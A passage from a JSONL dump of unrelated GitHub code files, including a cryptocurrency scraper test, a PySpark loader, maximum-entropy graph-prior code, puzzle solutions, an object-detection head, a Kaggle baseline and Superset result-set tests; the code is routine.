'utf-8')\n html = f.read()\n f.close()\n data = parseCurrencyListAll(html)\n self.assertEqual(len(data), 452)\n expectedFirst = {\n 'name': 'Bitcoin',\n 'slug': 'bitcoin',\n 'symbol': 'BTC',\n 'explorer_link': 'http://blockchain.info'\n }\n self.assertEqual(data[0], expectedFirst)\n expectedLast = {\n 'name': 'Marscoin',\n 'slug': 'marscoin',\n 'symbol': 'MRS',\n 'explorer_link': 'http://explore.marscoin.org/chain/Marscoin/'\n }\n self.assertEqual(data[-1], expectedLast)\n\n def testParseMarketCap(self):\n \"\"\"Test parseMarketCap.\"\"\"\n f = open(\"{0}/example/marketcap_navajo_7d.json\".format(\n os.path.dirname(os.path.abspath(__file__))), 'r')\n jsonDump = f.read()\n f.close()\n\n data = parseMarketCap(jsonDump, 'navajo')\n self.assertEqual(len(data), 287)\n self.maxDiff = None\n expectedFirst = {\n 'currency': 'navajo',\n 'time': datetime.utcfromtimestamp(1406855058),\n 'market_cap_by_available_supply': 196545.14489832715,\n 'market_cap_by_total_supply': 196545.14489832715,\n 'price_usd': 0.00344855,\n 'price_btc': .00000588286,\n 'est_available_supply': 56993561.0324128,\n 'est_total_supply': 56993561.0324128\n }\n self.assertEqual(data[0], expectedFirst)\n expectedLast = {\n 'currency': 'navajo',\n 'time': datetime.utcfromtimestamp(1407458053),\n 'market_cap_by_available_supply': 124991.3258020573,\n 'market_cap_by_total_supply': 124991.3258020573,\n 'price_usd': 0.00219195,\n 'price_btc': .00000372172,\n 'est_available_supply': 57022890.942794,\n 'est_total_supply': 57022890.942794\n }\n self.assertEqual(data[-1], expectedLast)\n\n data, volData = parseMarketCap(\n jsonDump, 'navajo', includeVolume=True)\n self.assertEqual(len(volData), 7)\n expectedVolFirst = {\n 'currency': 'navajo',\n 'time': datetime.utcfromtimestamp(1406855058),\n 'volume': 2447.37\n }\n self.assertEqual(volData[0], expectedVolFirst)\n expectedVolLast = {\n 'currency': 'navajo',\n 'time': datetime.utcfromtimestamp(1407375855),\n 'volume': 477.609\n }\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"gogogoutham/coinmarketcap-scraper","sub_path":"coinmarketcap.py","file_name":"coinmarketcap.py","file_ext":"py","file_size_in_byte":9691,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"61"} +{"seq_id":"38545361224","text":"from pyspark.sql import DataFrame\n\n\ndef load(type: str, df: DataFrame, target: str):\n \"\"\"\n Load Data to Database and Filesystem based on type\n :param type: Input Storage type (JDBC|CSV) Based on type data stored in MySQL or FileSystem\n :param df: Input Dataframe\n :param target:\n :return: Input target -For filesystem - Location where to store the data\n -For MySQL - table name\n \"\"\"\n\n driver_name = \"org.sqlite.JDBC\"\n url = \"jdbc:sqlite:/Users/Carballeira/sqlite/db/cctx.db\"\n\n if type == \"JDBC\":\n\n df.write.format(\"jdbc\")\\\n .mode(\"append\")\\\n .option(\"url\", url)\\\n .option(\"dbtable\", target)\\\n .option(\"driver\",driver_name)\\\n .save()\n\n print(f\"Data successfully loaded to SQLite Database !!\")\n\n if type == \"CSV\":\n # Write data on filesystem\n df.write.format(\"CSV\").mode(\"overwrite\").options(header=True).save(target)\n print(f\"Data successfully loaded to filesystem !!\")","repo_name":"adriancarballeira/moneytrackerapp","sub_path":"src/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"183612984","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom scipy import sparse\n\nfrom embedding.cne.degree_prior import BackgroundDistribution\n\n\nclass BgDistBuilder:\n @staticmethod\n def build(A, prior, block_mask=None, attributes=None):\n \"\"\"\n :param A: adjacency matrix, preferably CSR (compressed sparse row) matrix.\n :param prior: prior type.\n :param block_mask: indicates which block number each node in A belongs to.\n :param attributes: a list of |attribute_types| arrays that map nodes to the corresponding attribute values.\n Column sums will taken over nodes with identical attribute values.\n :return: the desired background distribution object (unfitted).\n \"\"\"\n if prior == 'degree' or prior == 'uniform':\n return BackgroundDistribution(A, prior)\n\n if prior == 'block':\n return BgDistBlock(A, block_mask)\n\n if prior == 'degree_per_block':\n return BgDistDegreeBlock(A, block_mask, attributes)\n\n if prior == 'degree_per_block_eco':\n from embedding.cne_recommender.bg_dist_partite_economical import BgDistDegreeBlockEco\n return BgDistDegreeBlockEco(A, block_mask)\n if prior == 'degree_per_block_eco_mem':\n from embedding.cne_recommender.bg_dist_partite_economical_memory_efficient import BgDistDegreeBlockEcoMemoryEfficient\n return BgDistDegreeBlockEcoMemoryEfficient(A, block_mask)\n\n raise ValueError('Prior {:s} is not implemented'.format(prior))\n\n\nclass BgDistBlockAbstract:\n def __init__(self, A, block_mask):\n self._A = sparse.csr_matrix(A)\n self._block_mask = block_mask\n\n def fit(self):\n \"\"\"\n Find the maximum entropy distribution, subject to the given constraints.\n \"\"\"\n raise NotImplementedError\n\n def get_probability(self, row_ids, col_ids):\n \"\"\"\n Compute P probability for the elements specified by row_ids and col_ids.\n :param row_ids: For every entry, its row index.\n :param col_ids: For every entry, its col index.\n :return: the probabilities of the specified elements in the fitted distribution.\n \"\"\"\n raise NotImplementedError\n\n def get_full_P_matrix(self):\n pass\n\n def set_full_P_matrix(self, P):\n pass\n\n\nclass BgDistBlock(BgDistBlockAbstract):\n # Constraint(s): total block sum.\n\n def __init__(self, A, block_mask):\n super(BgDistBlock, self).__init__(A, block_mask)\n\n # Count block sizes and number of blocks.\n part_nbs, self._part_counts = np.unique(self._block_mask, return_counts=True)\n self._nb_parts = part_nbs.shape[0]\n self.__part_density = np.zeros((self._nb_parts, self._nb_parts))\n\n def fit(self):\n for i in range(self._nb_parts):\n for j in range(self._nb_parts):\n # Collect all the rows from block i.\n rows = self._A[self._block_mask == i]\n\n # From those rows, collect the elements from block j.\n subA = rows[:, self._block_mask == j]\n\n n, m = subA.shape\n self.__part_density[i, j] = subA.count_nonzero() / (n * m)\n\n def get_probability(self, row_ids, col_ids):\n row_parts = self._block_mask[row_ids]\n col_parts = self._block_mask[col_ids]\n\n return self.__part_density[row_parts, col_parts]\n\n def get_row_probability(self, row_ids, col_ids):\n return self.get_probability(row_ids, col_ids)\n\n\nclass BgDistDegreeBlock(BgDistBlockAbstract):\n # Constraint(s): total block sum and total node degree.\n\n def __init__(self, A, block_mask, attributes=None):\n super(BgDistDegreeBlock, self).__init__(A, block_mask)\n self.__atttributes = attributes\n\n self.__P = None\n\n def fit(self):\n \"\"\"\n For now, this function was made as a basic example for priors that use attribute-wise sums. In the future,\n it should also be possible to extend to economical lambdas.\n Assumptions:\n - The network is undirected. (the whole matrix is computed, but the topright triangle is mirrored to the\n bottomleft at the end)\n - Attributes are only defined for rows, not columns. The sums are then taken over the columns.\n \"\"\"\n\n block_types = np.unique(self._block_mask)\n assert np.all(block_types == np.arange(block_types.shape[0]))\n\n P = np.empty(self._A.shape, dtype=np.float)\n P[:] = np.nan\n\n for type_i in range(block_types.shape[0]):\n row_mask = self._block_mask == type_i\n for type_j in range(type_i, block_types.shape[0]):\n col_mask = self._block_mask == type_j\n\n sub_A = self._A[np.ix_(row_mask, col_mask)]\n\n # First, check if the total sum is not just zero. In that case, we can avoid doing any calculations.\n total_sum = sub_A.count_nonzero()\n if total_sum == 0:\n P[np.ix_(row_mask, col_mask)] = 0.0\n P[np.ix_(col_mask, row_mask)] = 0.0\n continue\n\n # Lamdas aggregator keeps track of several 'lambdas' objects.\n lambdas = LambdasAggregator()\n\n # Define some functions to easily construct row and column lambdas.\n def construct_row_lambdas(row_mask_, col_mask_):\n sub_sub_A = sub_A[np.ix_(row_mask_, col_mask_)]\n\n # Compute the row sum for the given submatrix.\n # The expected row sum will have to match the actual sum.\n row_sums = sub_sub_A.sum(axis=1).A.squeeze()\n\n # Construct Lambdas object for the row degree prior.\n row_lambdas = RowDegreeLambdas(row_sums, row_mask_, col_mask_)\n lambdas.add_lambdas_object(row_lambdas)\n\n def construct_col_lambdas(row_mask_, col_mask_):\n sub_sub_A = sub_A[np.ix_(row_mask_, col_mask_)]\n\n # The col_sums are computed in a similar way.\n col_sums = sub_sub_A.sum(axis=0).A.squeeze()\n\n # Construct Lambdas object for the column degree prior.\n col_lambdas = ColumnDegreeLambdas(col_sums, row_mask_, col_mask_)\n lambdas.add_lambdas_object(col_lambdas)\n\n # Where the row and col masks are true, we build sub-masks of all ones.\n sub_full_row_mask = np.ones(np.sum(row_mask), dtype=np.bool)\n sub_full_col_mask = np.ones(np.sum(col_mask), dtype=np.bool)\n\n if self.__atttributes is None:\n construct_row_lambdas(sub_full_row_mask, sub_full_col_mask)\n construct_col_lambdas(sub_full_row_mask, sub_full_col_mask)\n\n else:\n already_a_full_row_constraint = False\n already_a_full_col_constraint = False\n for attribute_array in self.__atttributes.values():\n possible_values = pd.unique(attribute_array)\n for attribute_val in possible_values:\n if attribute_val == \"N/A\":\n continue\n\n sub_row_mask = attribute_array[row_mask] == attribute_val\n # If there are no attributed rows to sum over for the column lambda, then make sure that\n # there is a constraint that sums over all rows.\n if not np.any(sub_row_mask):\n if not already_a_full_col_constraint:\n construct_col_lambdas(sub_full_row_mask, sub_full_col_mask)\n already_a_full_col_constraint = True\n else:\n construct_col_lambdas(sub_row_mask, sub_full_col_mask)\n\n sub_col_mask = attribute_array[col_mask] == attribute_val\n if not np.any(sub_col_mask):\n if not already_a_full_row_constraint:\n construct_row_lambdas(sub_full_row_mask, sub_full_col_mask)\n already_a_full_row_constraint = True\n else:\n construct_row_lambdas(sub_full_row_mask, sub_col_mask)\n\n # Find lambda values using Newton optimization.\n P_sub = newton_optimization(lambdas, nit=100)\n\n P[np.ix_(row_mask, col_mask)] = P_sub\n P[np.ix_(col_mask, row_mask)] = P_sub.T\n\n self.__P = P\n\n def get_probability(self, row_ids, col_ids):\n return self.__P[row_ids, col_ids]\n\n def get_row_probability(self, row_ids, col_ids):\n return self.get_probability(row_ids, col_ids)\n\n def get_full_P_matrix(self):\n return self.__P\n\n def set_full_P_matrix(self, P):\n self.__P = P\n\n\ndef newton_optimization(lambdas, nit=100, tol=1e-8):\n alpha = 1.0\n prev_alpha = alpha\n P = None\n grad = None\n delta_la = None\n lagrangian = None\n start_time = time.time()\n for k in range(nit):\n # This is the first iteration, so calculate the initial values.\n if k == 0:\n E = lambdas.compute_E()\n lagrangian = lambdas.compute_lagrangian(E)\n P, grad, delta_la = lambdas.compute_P_and_grad(E)\n\n # Find the largest alpha that satisfies the first Wolfe condition.\n # This is done by halving alpha until it happens.\n while True:\n # Step in direction of gradient.\n lambdas.try_step(alpha)\n\n # Compute lagrangian with this alpha.\n E_try = lambdas.compute_E()\n lagrangian_try = lambdas.compute_lagrangian(E_try)\n\n # Check first Wolfe condition.\n if lagrangian_try <= lagrangian + 1e-4*alpha*(delta_la.dot(grad)):\n # print(\"lagrangian: \"+str(lagrangian_try)+\", alpha: \"+str(alpha))\n\n # Condition is satisfied, the recently tried values are taken as the new current values.\n E = E_try\n lagrangian = lagrangian_try\n lambdas.finalize_step()\n P, grad, delta_la = lambdas.compute_P_and_grad(E)\n break\n else:\n alpha /= 2\n if alpha < 1e-8:\n break\n\n # Some stop conditions.\n if np.linalg.norm(grad) / grad.shape[0] < tol or k >= nit - 1 or alpha < 1e-8:\n time_diff = time.time() - start_time\n print(\"Computed degree+block prior in \" + str(k+1) +\n \" iterations (\" + str(int(time_diff / 60)) + \"m \" + str(int(time_diff % 60)) + \"s).\")\n break\n\n # If the previous best alpha was the same as the current best alpha, then increase alpha.\n if prev_alpha == alpha:\n prev_alpha = alpha\n alpha = min(1.0, alpha*2)\n else:\n prev_alpha = alpha\n\n return P\n\n\nclass Lambdas:\n \"\"\"\n General class for Lagrange multipliers or 'lambdas'.\n \"\"\"\n def __init__(self):\n self.la = None\n self._delta_la = None\n self._backup_la = None\n\n def exponent_term(self):\n raise NotImplementedError\n\n def lagrangian_term(self):\n raise NotImplementedError\n\n def grad(self, partial_derivatives, P):\n raise NotImplementedError\n\n def try_step(self, alpha):\n if self._backup_la is None:\n self._backup_la = self.la\n self.la = self._backup_la + alpha * self._delta_la\n\n def finalize_step(self):\n self._delta_la = None\n self._backup_la = None\n\n\nclass RowDegreeLambdas(Lambdas):\n \"\"\"\n For the constraint where the expected row sum (for the submatrix specified by row_mask and col_mask) is equal to the\n actual sum.\n \"\"\"\n def __init__(self, degrees, row_mask, col_mask):\n super(RowDegreeLambdas, self).__init__()\n self.__degrees = degrees\n self.__row_mask = row_mask\n self.__col_mask = col_mask\n\n # Array of lambdas for row degrees.\n self.la = np.zeros(degrees.shape[0], dtype=np.float)\n\n # Initialization based on heuristics.\n P_estimate = (degrees + 1) / (np.sum(col_mask) + 1)\n self.la = np.log(P_estimate / (1 - P_estimate)) / 2\n\n def exponent_term(self):\n padded_la = np.zeros_like(self.__row_mask, dtype=np.float)\n padded_la[self.__row_mask] = self.la\n arranged_la = np.outer(padded_la, self.__col_mask)\n return arranged_la\n\n def lagrangian_term(self):\n return np.sum(self.la * self.__degrees)\n\n def grad(self, partial_derivatives, P):\n grad = (P.dot(self.__col_mask))[self.__row_mask] - self.__degrees\n hessian = (partial_derivatives.dot(self.__col_mask))[self.__row_mask]\n self._delta_la = -grad / (hessian + hessian.shape[0] * 1e-10)\n return self._delta_la, grad\n\n\nclass ColumnDegreeLambdas(Lambdas):\n \"\"\"\n For the constraint where the expected column sum (for the submatrix specified by row_mask and col_mask) is equal to\n the actual sum.\n \"\"\"\n def __init__(self, degrees, row_mask, col_mask):\n super(ColumnDegreeLambdas, self).__init__()\n self.__degrees = degrees\n self.__row_mask = row_mask\n self.__col_mask = col_mask\n\n # Array of lambdas for column degrees.\n self.la = np.zeros(degrees.shape[0], dtype=np.float)\n\n # Initialization based on heuristics.\n P_estimate = (degrees + 1) / (np.sum(row_mask) + 1)\n self.la = np.log(P_estimate / (1 - P_estimate)) / 2\n\n def exponent_term(self):\n padded_la = np.zeros_like(self.__col_mask, dtype=np.float)\n padded_la[self.__col_mask] = self.la\n return np.outer(self.__row_mask, padded_la)\n\n def lagrangian_term(self):\n return np.sum(self.la * self.__degrees)\n\n def grad(self, partial_derivatives, P):\n grad = (P.T.dot(self.__row_mask))[self.__col_mask] - self.__degrees\n hessian = (partial_derivatives.T.dot(self.__row_mask))[self.__col_mask]\n self._delta_la = -grad / (hessian + hessian.shape[0] * 1e-10)\n return self._delta_la, grad\n\n\nclass LambdasAggregator:\n \"\"\"\n Perform aggregation operations on the lambdas objects. It is assumed that every element follows an independent\n Bernoulli distribution.\n \"\"\"\n def __init__(self):\n self._lambdas_list = []\n self._backup_vals = None\n\n def add_lambdas_object(self, lambdas):\n assert isinstance(lambdas, Lambdas)\n self._lambdas_list.append(lambdas)\n\n def compute_E(self):\n exponent = 0\n for lambdas in self._lambdas_list:\n exp_term = lambdas.exponent_term()\n exponent += exp_term\n return np.exp(exponent)\n\n def compute_lagrangian(self, E):\n lag = np.log(self._Z(E))\n lag = np.sum(lag)\n for lambdas in self._lambdas_list:\n lag -= lambdas.lagrangian_term()\n return lag\n\n def compute_P_and_grad(self, E):\n Z = self._Z(E)\n P = E / Z\n partial_derivatives = E / (Z ** 2)\n\n delta_las = []\n grads = []\n for lambdas in self._lambdas_list:\n delta_la, grad = lambdas.grad(partial_derivatives, P)\n grads.append(grad)\n delta_las.append(delta_la)\n grad = np.concatenate(grads)\n delta_la = np.concatenate(delta_las)\n return P, grad, delta_la\n\n def try_step(self, alpha):\n for lambdas in self._lambdas_list:\n lambdas.try_step(alpha)\n\n def finalize_step(self):\n for lambdas in self._lambdas_list:\n lambdas.finalize_step()\n\n @staticmethod\n def _Z(E):\n \"\"\"\n Calculate the partition function Z(lambda).\n \"\"\"\n return 1 + E\n","repo_name":"aida-ugent/GraB","sub_path":"embedding/cne_recommender/bg_dist_partite.py","file_name":"bg_dist_partite.py","file_ext":"py","file_size_in_byte":15942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"22004858013","text":"import sys; sys.stdin = open(\"input/1120.txt\", \"r\")\n\nA, B = input().split()\n\nresult = []\nfor i in range(len(B) - len(A) + 1):\n total = 0\n for j in range(len(A)):\n if A[j] != B[i + j]:\n total += 1\n result.append(total)\nprint(min(result))","repo_name":"vreez/APS","sub_path":"boj/boj_1120_문자열.py","file_name":"boj_1120_문자열.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23457955661","text":"\r\nmemory = {\r\n\t1: [0, 1],\r\n\t2: [1, 1],\r\n\t3: [1, 2],\r\n\t4: [2, 2],\r\n\t5: [2, 3],\r\n\t6: [3, 3],\r\n\t7: [3, 4],\r\n\t8: [4, 4],\r\n\t9: [4, 5]\r\n}\r\n\r\nt = int(input())\r\ncnt = 1\r\n\r\nwhile (t):\r\n\tx = int(input())\r\n\r\n\tli = list(input().split())\r\n\tli = [int(i) for i in li]\r\n\tliUnMod = [int(i) for i in li]\r\n\r\n\tarr9 = [float(\"inf\")]\r\n\tindex = 0\r\n\t\t\r\n\t# print(liUnMod)\r\n\r\n\tif li.count(9) is 1:\r\n\t\twhile any(i>1 for i in li):\r\n\t\t\tmaxEle = max(li)\r\n\t\r\n\t\t\tarr9.append(maxEle+ index)\r\n\t\t\tindex += 1\r\n\t\t\t\r\n\t\t\tif maxEle is 9:\r\n\t\t\t\tli.append(3)\r\n\t\t\t\tli.append(6)\r\n\t\t\telse:\r\n\t\t\t\tli.append(memory[maxEle][0])\r\n\t\t\t\tli.append(memory[maxEle][1])\r\n\t\t\t\r\n\t\t\ti = li.index(maxEle)\r\n\t\t\tdel(li[i])\r\n\t\t# print(\"Case #\"+ str(cnt) + \": \" + str(min(arr9)))\r\n\r\n\tli = liUnMod\r\n\tarr = [float(\"inf\")]\r\n\tindex = 0\r\n\t# print(li)\r\n\r\n\tif any(i>1 for i in li):\r\n\t\twhile any(i>1 for i in li):\r\n\t\t\tmaxEle = max(li)\r\n\t\r\n\t\t\tarr.append(maxEle+ index)\r\n\t\t\tindex += 1\r\n\t\t\t\r\n\t\t\tli.append(memory[maxEle][0])\r\n\t\t\tli.append(memory[maxEle][1])\r\n\t\t\t\r\n\t\t\ti = li.index(maxEle)\r\n\t\t\tdel(li[i])\r\n\r\n\t\tprint(\"Case #\"+ str(cnt) + \": \" + str(min(min(arr), min(arr9))))\r\n\t\t\t\r\n\telse:\t\t\r\n\t\tprint(\"Case #\"+ str(cnt) + \": 1\")\r\n\r\n\tt -= 1\r\n\tcnt += 1","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_156/1007.py","file_name":"1007.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39542762183","text":"import tensorflow as tf\nfrom keras.layers import Layer, Input, Conv2D, MaxPool2D, Activation\n\n@tf.keras.utils.register_keras_serializable()\nclass PredictionHead(Layer):\n \"\"\"Concatenate all feature maps for detection\n\n Args:\n Layer (_type_): _description_\n \"\"\"\n\n def __init__(self, last_dimension, **kwargs):\n super(PredictionHead, self).__init__(**kwargs)\n self.last_dimension = last_dimension\n\n def get_config(self):\n config = super(PredictionHead, self).get_config()\n config.update({\"last_dimension\": self.last_dimension})\n return config\n\n def call(self, inputs, *args, **kwargs):\n last_dimension = self.last_dimension\n batch_size = tf.shape(inputs[0])[0]\n\n outputs = []\n for conv_layer in inputs:\n outputs.append(tf.reshape(conv_layer, (batch_size, -1, last_dimension)))\n return tf.concat(outputs, axis=1)\n\ndef get_head_from_outputs(hyper_params, outputs):\n \"\"\"Produce ssd bounding boxes delta and label heads.\n\n Args:\n hyper_params (dictionary): _description_ outputs (list): _description_\n\n Outputs:\n pred_deltas (concenated bbox delta head) : \n pred_labels (concenated label head) : \n\n \"\"\"\n total_labels = hyper_params[\"total_labels\"]\n len_aspect_ratio = [len(x) + 1 for x in hyper_params[\"aspect_ratios\"]]\n labels_head = []\n bboxes_head = []\n for i, output in enumerate(outputs):\n ar = len_aspect_ratio[i]\n labels_head.append(Conv2D(ar * total_labels, (3, 3), padding=\"same\", name=\"conv_labels_{}\".format(i+1))(output))\n bboxes_head.append(Conv2D(ar * 4, (3, 3), padding=\"same\", name=\"conv_bboxes_{}\".format(i+1))(output))\n pred_labels = PredictionHead(total_labels, name=\"labels_head\")(labels_head)\n pred_labels = Activation(\"softmax\", name=\"conf\")(pred_labels)\n pred_deltas = PredictionHead(4, name=\"loc\")(bboxes_head)\n return pred_deltas, pred_labels\n","repo_name":"Muhammadiqbal-git/SSD_TF_SKRIPSI","sub_path":"Workspace/code/models/prediction_head.py","file_name":"prediction_head.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2467395960","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nimport os\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score, f1_score, classification_report, \\\n make_scorer\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, LSTM\n\nimport pickle\n\nDIR_JURE = '/media/interferon/44B681D7B681C9BE/kaggle/home-credit-default\\\n-risk-data'\n\ndef init():\n df_appl_test = pd.read_csv('application_test.csv')\n df_appl_train = pd.read_csv('application_train.csv')\n return df_appl_train, df_appl_test\n\n\n# Provjeri koj isu stupci categorical i koje vrijednosti primaju\ndef data_analysis(df_app_train):\n df_x = df_app_train.loc[:, df_app_train.columns != 'TARGET']\n\n for i in range(len(df_x.dtypes)):\n if df_x.dtypes[i] == object:\n print('===============')\n print('categorical col', df_x.columns[i])\n print('unique vals', set(list(df_x[df_x.columns[i]])))\n\n\ndef convert_cat_to_numer(df):\n for col_name in df.columns:\n if(df[col_name].dtype == 'object'):\n df[col_name]= df[col_name].astype('category')\n df[col_name] = df[col_name].cat.codes\n\n\ndef simple_baseline(df_app_train, df_app_test):\n print('> simple_baseline')\n print('df_app_train.shape', df_app_train.shape)\n print('df_app_test.shape', df_app_test.shape)\n \n convert_cat_to_numer(df_app_train)\n convert_cat_to_numer(df_app_test)\n \n df_x = df_app_train.loc[:, df_app_train.columns != 'TARGET']\n df_y = df_app_train['TARGET']\n \n df_x = df_x.as_matrix().astype(np.float)\n df_y = df_y.as_matrix().astype(np.float)\n \n df_x = np.nan_to_num(df_x)\n df_y = np.nan_to_num(df_y)\n \n x_train, x_test, y_train, y_test = train_test_split(df_x, df_y,\n test_size=0.2, random_state=42)\n \n clf = LinearSVC()\n clf.fit(x_train, y_train)\n pred = clf.predict(x_test)\n print('acc', accuracy_score(pred, y_test))\n print('f1', f1_score(pred, y_test, average = None))\n print('f1_macro', f1_score(pred, y_test, average = 'macro'))\n\n\nif __name__ == \"__main__\":\n os.chdir(DIR_JURE)\n\n df_app_train, df_app_test = init()\n #data_analysis(df_app_train)\n #simple_baseline(df_app_train, df_app_test)\n\n exit(0)\n ","repo_name":"jurebb/home-credit-default-risk","sub_path":"baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2060415099","text":"def snail(array):\n if len(array) == 1: return array[0]\n arr = array[:]\n snail = []\n \n while len(arr) > 1:\n snail.extend(arr.pop(0))\n for i in range(0,len(arr)):\n snail.append(arr[i].pop())\n snail.extend(arr.pop()[::-1])\n for i in range(len(arr)-1,-1,-1):\n snail.append(arr[i].pop(0))\n \n if len(arr) > 0:\n snail.extend(arr[0])\n return snail\n\n\n# most clever\n\ndef snail(array):\n return list(array[0]) + snail(zip(*array[1:])[::-1]) if array else []","repo_name":"katielkrieger/algorithms","sub_path":"20170518_Snail_4kyu_Python/Snail.py","file_name":"Snail.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22328513367","text":"import turtle\r\ndef testDrive():\r\n turtle.forward(180)\r\n turtle.left(87)\r\n turtle.setheading(127)\r\n turtle.up()\r\n turtle.goto(50,40)\r\n turtle.home()\r\n turtle.down()\r\n turtle.circle(25)\r\ndef turtleState():\r\n v2 = turtle.isdown()\r\n v3 = turtle.heading()\r\n tXcor = turtle.xcor()\r\n tYcor = turtle.ycor()\r\n print(\"turtle is down?\", v2)\r\n print(\"turtle heading:\", v3)\r\n print(\"xcor: \",tXcor, \"ycor: \", tYcor)\r\ndef main():\r\n testDrive()\r\n turtleState()\r\n\r\nmain()\r\nprint (\"press Enter to continue...\")\r\n","repo_name":"GCIS-123-601/w2_lab1-A-Omar1","sub_path":"Omar_Abdelhamid_lab2_both programs.py","file_name":"Omar_Abdelhamid_lab2_both programs.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25168838645","text":"from datetime import datetime\n\nimport tests.integration_tests.test_app\nfrom superset.dataframe import df_to_records\nfrom superset.db_engine_specs import BaseEngineSpec\nfrom superset.result_set import dedup, SupersetResultSet\n\nfrom .base_tests import SupersetTestCase\n\n\nclass TestSupersetResultSet(SupersetTestCase):\n def test_dedup(self):\n self.assertEqual(dedup([\"foo\", \"bar\"]), [\"foo\", \"bar\"])\n self.assertEqual(\n dedup([\"foo\", \"bar\", \"foo\", \"bar\", \"Foo\"]),\n [\"foo\", \"bar\", \"foo__1\", \"bar__1\", \"Foo\"],\n )\n self.assertEqual(\n dedup([\"foo\", \"bar\", \"bar\", \"bar\", \"Bar\"]),\n [\"foo\", \"bar\", \"bar__1\", \"bar__2\", \"Bar\"],\n )\n self.assertEqual(\n dedup([\"foo\", \"bar\", \"bar\", \"bar\", \"Bar\"], case_sensitive=False),\n [\"foo\", \"bar\", \"bar__1\", \"bar__2\", \"Bar__3\"],\n )\n\n def test_get_columns_basic(self):\n data = [(\"a1\", \"b1\", \"c1\"), (\"a2\", \"b2\", \"c2\")]\n cursor_descr = ((\"a\", \"string\"), (\"b\", \"string\"), (\"c\", \"string\"))\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(\n results.columns,\n [\n {\"is_dttm\": False, \"type\": \"STRING\", \"column_name\": \"a\", \"name\": \"a\"},\n {\"is_dttm\": False, \"type\": \"STRING\", \"column_name\": \"b\", \"name\": \"b\"},\n {\"is_dttm\": False, \"type\": \"STRING\", \"column_name\": \"c\", \"name\": \"c\"},\n ],\n )\n\n def test_get_columns_with_int(self):\n data = [(\"a1\", 1), (\"a2\", 2)]\n cursor_descr = ((\"a\", \"string\"), (\"b\", \"int\"))\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(\n results.columns,\n [\n {\"is_dttm\": False, \"type\": \"STRING\", \"column_name\": \"a\", \"name\": \"a\"},\n {\"is_dttm\": False, \"type\": \"INT\", \"column_name\": \"b\", \"name\": \"b\"},\n ],\n )\n\n def test_get_columns_type_inference(self):\n data = [\n (1.2, 1, \"foo\", datetime(2018, 10, 19, 23, 39, 16, 660000), True),\n (3.14, 2, \"bar\", datetime(2019, 10, 19, 23, 39, 16, 660000), False),\n ]\n cursor_descr = ((\"a\", None), (\"b\", None), (\"c\", None), (\"d\", None), (\"e\", None))\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(\n results.columns,\n [\n {\"is_dttm\": False, \"type\": \"FLOAT\", \"column_name\": \"a\", \"name\": \"a\"},\n {\"is_dttm\": False, \"type\": \"INT\", \"column_name\": \"b\", \"name\": \"b\"},\n {\"is_dttm\": False, \"type\": \"STRING\", \"column_name\": \"c\", \"name\": \"c\"},\n {\"is_dttm\": True, \"type\": \"DATETIME\", \"column_name\": \"d\", \"name\": \"d\"},\n {\"is_dttm\": False, \"type\": \"BOOL\", \"column_name\": \"e\", \"name\": \"e\"},\n ],\n )\n\n def test_is_date(self):\n data = [(\"a\", 1), (\"a\", 2)]\n cursor_descr = ((\"a\", \"string\"), (\"a\", \"string\"))\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(results.is_temporal(\"DATE\"), True)\n self.assertEqual(results.is_temporal(\"DATETIME\"), True)\n self.assertEqual(results.is_temporal(\"TIME\"), True)\n self.assertEqual(results.is_temporal(\"TIMESTAMP\"), True)\n self.assertEqual(results.is_temporal(\"STRING\"), False)\n self.assertEqual(results.is_temporal(\"\"), False)\n self.assertEqual(results.is_temporal(None), False)\n\n def test_dedup_with_data(self):\n data = [(\"a\", 1), (\"a\", 2)]\n cursor_descr = ((\"a\", \"string\"), (\"a\", \"string\"))\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n column_names = [col[\"column_name\"] for col in results.columns]\n self.assertListEqual(column_names, [\"a\", \"a__1\"])\n\n def test_int64_with_missing_data(self):\n data = [(None,), (1239162456494753670,), (None,), (None,), (None,), (None,)]\n cursor_descr = [(\"user_id\", \"bigint\", None, None, None, None, True)]\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(results.columns[0][\"type\"], \"BIGINT\")\n\n def test_data_as_list_of_lists(self):\n data = [[1, \"a\"], [2, \"b\"]]\n cursor_descr = [\n (\"user_id\", \"INT\", None, None, None, None, True),\n (\"username\", \"STRING\", None, None, None, None, True),\n ]\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n df = results.to_pandas_df()\n self.assertEqual(\n df_to_records(df),\n 